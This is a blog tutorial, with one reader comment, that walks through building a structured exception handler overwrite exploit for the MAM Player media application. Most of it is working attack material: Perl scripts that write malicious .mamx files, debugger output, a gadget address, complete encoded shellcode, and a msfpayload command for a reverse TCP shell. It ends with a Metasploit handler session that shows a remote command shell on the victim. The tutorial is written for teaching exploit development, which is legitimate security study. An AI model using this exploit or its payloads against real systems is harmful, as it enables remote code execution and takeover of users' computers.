Another SEH tutorial



The application we will look at can be downloaded here.
http://www.musanim.com/player/MAMPlayer2006aug19_035.zip
The exploit has been documented here,
http://www.exploit-db.com/exploits/15901/
but we will go through the process of creating the exploit from scratch.
Credits to corelan for their great exploit writing tutorials.

First, confirm that the crash really takes place. Fill the buffer with around 5000 A's:

my $filename = "firstcrash.mamx";
my $junk = "A" x 5000;
my $payload = $junk;
open(my $FILE, '>', $filename) or die "cannot open $filename: $!";
binmode($FILE);   # write the bytes exactly as built
print $FILE $payload;
close($FILE);

Open the program with windbg as an executable and run it. Open the file firstcrash.mamx and the program crashes. Press F5 or type g, then confirm with !exchain that this is an SEH problem:

0:000> g
(538.440): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=0012f10c ebp=0012f12c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+0x414140f0:
41414141 ?? ???
0:000> !exchain
0012f120: ntdll!ExecuteHandler2+3a (7c9032bc)
0012f6b0: MAM2006+3c078 (0043c078)
0012f6ec: MAM2006+3c078 (0043c078)
0012fa60: +414140f0 (41414141)
Invalid exception stack at 41414141

Second, send the same 5000 characters as a Metasploit pattern so that we can determine exactly where the crash takes place:

root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb 5000 > /home/chalo/pgm/sploitattion/fat/crash.mamx

Open mamplayer with windbg again and open the crash.mamx file. The application crashes again. Press F5 or type g, then load the byakugan plugin from Metasploit to determine the offset:

0:000> !load byakugan
[Byakugan] Successfully loaded!
0:000> !pattern_offset 5000
[Byakugan] Control of ecx at offset 116.
[Byakugan] Control of eip at offset 116.
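As an added example (not part of the original post or of Metasploit), the Python below reimplements what pattern_create.rb and byakugan's !pattern_offset do, so the offset the debugger reports can be checked by hand. It uses the 5000-byte length and the offset 116 from above; the register value 0x39644138 is constructed from the pattern here, since the post only shows byakugan's result.

```python
import string
import struct

# Metasploit's cyclic pattern: a run of "Upper lower digit" triples
# (Aa0Aa1Aa2...). Within the first 20280 bytes every 4-byte window is
# unique, so whatever lands in a register pins down one offset.
def pattern_create(length: int) -> bytes:
    base = "".join(u + l + d
                   for u in string.ascii_uppercase
                   for l in string.ascii_lowercase
                   for d in string.digits).encode()
    reps = length // len(base) + 1
    return (base * reps)[:length]

def pattern_offset(value, length: int = 5000) -> int:
    """Locate a crash value inside the pattern that was sent.

    `value` is what the debugger showed: an int register value (ecx/eip),
    which sits in memory little-endian, or the 4 raw bytes themselves.
    Returns -1 if the value is not part of the pattern (e.g. 41414141 from
    the plain "A" buffer, or bytes mangled on the way into the register).
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value)   # reverse the little-endian read
    elif isinstance(value, str):
        needle = value.encode()
    else:
        needle = bytes(value)
    return pattern_create(length).find(needle)

def crash_value_at(offset: int, length: int = 5000) -> int:
    """The 32-bit value a register reads when it is loaded from `offset`
    of the pattern (constructed here; the post only shows offset 116)."""
    pat = pattern_create(length)
    return struct.unpack("<I", pat[offset:offset + 4])[0]

if __name__ == "__main__":
    value = crash_value_at(116)   # 0x39644138, the bytes "8Ad9"
    print(f"register shows {value:08x} -> offset {pattern_offset(value)}")
    print("plain-A crash:", pattern_offset(0x41414141))   # -1, not a pattern
```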

We now need a pop pop ret address to use. We can check which DLLs are loaded by the mamplayer application and use msfpescan from Metasploit to look for a workable address. Checking windbg, we notice some DLLs that mamplayer uses:

ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll
ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
ModLoad: 10000000 10050000 C:\WINDOWS\system32\VBoxOGL.dll
ModLoad: 01780000 017c0000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll

We copy msacm32.drv over to our Linux box and use msfpescan to get addresses we can use as the SEH handler:

root@bt:/pentest/exploits/framework3# ./msfpescan -p /home/chalo/pgm/sploitattion/fat/msacm32.drv > /home/chalo/pgm/sploitattion/fat/memaddresses.txt
root@bt:/home/chalo/pgm/sploitattion/fat# cat memaddresses.txt | grep "pop edi; pop esi; "
0x72d11225 pop edi; pop esi; retn 0x000c
0x72d11f39 pop edi; pop esi; retn 0x0004
0x72d1263d pop edi; pop esi; retn 0x0008
0x72d1269c pop edi; pop esi; retn 0x0008

We now need to check what the stack looks like. We put breakpoints in our code:

my $filename = "crash3.mamx";
my $junk = "A" x 112;                # 116 - 4: offset to SEH minus the 4-byte nseh
my $nseh = "\xcc\xcc\xcc\xcc";       # breakpoints, so we see where nseh lands
my $seh = pack('V', 0x72d11f39);     # pop edi; pop esi; retn 0x0004 in msacm32.drv
my $shellcode = "1234567890qwertyuiopasdfghjkl";   # marker bytes for now
my $junk2 = "D" x 300;

my $payload = $junk . $nseh . $seh . $shellcode . $junk2;
open(my $FILE, '>', $filename) or die "cannot open $filename: $!";
binmode($FILE);
print $FILE $payload;
close($FILE);

Let's check the stack:

0:000> g
(88.4ac): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=72d11f39 edx=7c9032bc esi=0012f154 edi=7c9032a8
eip=0012fa60 esp=0012f07c ebp=0012f08c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
+0x12fa0f:
0012fa60 cc int 3
0:000> d eip
0012fa60 cc cc cc cc 39 1f d1 72-31 32 33 34 35 36 37 38 ….9..r12345678
0012fa70 39 30 61 62 63 64 65 66-67 68 69 6a 6b 6c 6d 6e 90abcdefghijklmn
0012fa80 6f 70 71 72 73 74 75 76-77 78 79 7a 44 44 44 44 opqrstuvwxyzDDDD
0012fa90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012faa0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fab0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fac0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fad0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD

Good, there are no gaps between our data. Now we just need to set the next SEH handler (nseh) to jump 6 bytes: a short jump \xeb\x06 is counted from the end of its own 2-byte instruction, so it skips the two NOPs and the 4-byte SEH address and lands right on the shellcode. Replace the shellcode with breakpoints:

my $filename = "crash3.mamx";
my $junk = "A" x 112;                # 116 - 4
my $nseh = "\xeb\x06\x90\x90";       # jmp short +6, padded with two NOPs
my $seh = pack('V', 0x72d11f39);     # pop edi; pop esi; retn
my $shellcode = "\xcc\xcc\xcc\xcc";  # breakpoints in place of shellcode
my $junk2 = "D" x 300;

my $payload = $junk . $nseh . $seh . $shellcode . $junk2;
open(my $FILE, '>', $filename) or die "cannot open $filename: $!";
binmode($FILE);
print $FILE $payload;
close($FILE);

Checking the stack again:

0:000> g
(3a8.5f0): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=72d11f39 edx=7c9032bc esi=0012f154 edi=7c9032a8
eip=0012fa68 esp=0012f07c ebp=0012f08c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
+0x12fa17:
0012fa68 cc int 3
0:000> d eip
0012fa68 cc cc cc cc 44 44 44 44-44 44 44 44 44 44 44 44 ….DDDDDDDDDDDD
0012fa78 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fa88 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fa98 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012faa8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fab8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fac8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fad8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD

Replace the breakpoints with real shellcode from msfpayload to pop a calc and pwn the application:

chalo@bt:/pentest/exploits/framework3$ ./msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | ./msfencode -e x86/alpha_upper -t c

So the new code becomes:

my $filename = "crash5.mamx";
my $junk = "A" x 112;                # 116 - 4
my $nseh = "\xeb\x06\x90\x90";       # jmp short +6 over the SEH address
my $seh = pack('V', 0x72d11f39);     # pop edi; pop esi; retn

# windows/exec CMD=calc.exe, encoded with x86/alpha_upper
my $shellcode =
"\x89\xe1\xda\xcb\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43" .
"\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41" .
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42" .
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50" .
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4c\x49\x43\x30\x45" .
"\x50\x45\x50\x43\x50\x4b\x39\x5a\x45\x56\x51\x4e\x32\x52\x44" .
"\x4c\x4b\x56\x32\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x56" .
"\x32\x52\x34\x4c\x4b\x43\x42\x56\x48\x54\x4f\x4f\x47\x51\x5a" .
"\x51\x36\x56\x51\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c\x43" .
"\x51\x43\x4c\x45\x52\x56\x4c\x47\x50\x49\x51\x58\x4f\x54\x4d" .
"\x45\x51\x4f\x37\x4b\x52\x4c\x30\x50\x52\x56\x37\x4c\x4b\x56" .
"\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x4e\x30\x4c\x4b" .
"\x47\x30\x52\x58\x4d\x55\x49\x50\x52\x54\x50\x4a\x45\x51\x4e" .
"\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x47\x50" .
"\x45\x51\x4e\x33\x4d\x33\x47\x4c\x50\x49\x4c\x4b\x50\x34\x4c" .
"\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x56\x51\x4f\x30\x4e\x4c" .
"\x49\x51\x58\x4f\x54\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x54" .
"\x35\x4c\x34\x45\x53\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x56\x44" .
"\x52\x55\x4d\x32\x51\x48\x4c\x4b\x50\x58\x47\x54\x45\x51\x49" .
"\x43\x45\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x45\x4c" .
"\x43\x31\x58\x53\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x58\x50\x4b" .
"\x39\x50\x44\x47\x54\x47\x54\x51\x4b\x51\x4b\x43\x51\x51\x49" .
"\x51\x4a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x51\x4a\x4c" .
"\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x43\x5a\x43\x31\x4c\x4d" .
"\x4c\x45\x4e\x59\x43\x30\x45\x50\x45\x50\x56\x30\x43\x58\x56" .
"\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x49\x45\x4f\x4b\x4b\x4e" .
"\x54\x4e\x47\x42\x4b\x5a\x52\x48\x49\x36\x5a\x35\x4f\x4d\x4d" .
"\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x43\x4c\x45\x5a\x4b\x30" .
"\x4b\x4b\x4d\x30\x43\x45\x54\x45\x4f\x4b\x50\x47\x54\x53\x52" .
"\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43\x53" .
"\x43\x51\x52\x4c\x52\x43\x56\x4e\x45\x35\x52\x58\x43\x55\x43" .
"\x30\x54\x4a\x41\x41";

my $junk2 = "D" x 300;
my $payload = $junk . $nseh . $seh . $shellcode . $junk2;
open(my $FILE, '>', $filename) or die "cannot open $filename: $!";
binmode($FILE);
print $FILE $payload;
close($FILE);

Open the file with the application and you will be able to pop a calc. You can modify the shellcode to do tasks such as a reverse shell on a TCP port:

chalo@bt:/pentest/exploits/framework3$ ./msfpayload windows/shell/reverse_tcp EXITFUNC=seh LHOST=192.168.10.1 LPORT=4444 R | ./msfencode -e x86/alpha_upper -t c

Then change the shellcode above from the calc payload to the new reverse shell shellcode. Set up your Metasploit listener first, and after that open the new file with mamplayer. Boom!!!! You get your reverse shell back:


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf exploit(handler) > set EXITFUNC seh
EXITFUNC => seh
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.10.1:4444
[*] Starting the payload handler...
[*] Sending stage (240 bytes) to 192.168.10.130
[*] Command shell session 1 opened (192.168.10.1:4444 -> 192.168.10.130:1032) at Wed Jan 12 12:27:51 +0300 2011

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\bb\Desktop\rr\fat>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.10.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

C:\Documents and Settings\bb\Desktop\rr\fat>


2 Responses to Another SEH tutorial

  1. Bright Gameli says:

    Dope stuff man….I like I like I like!!!!!!!!!!!
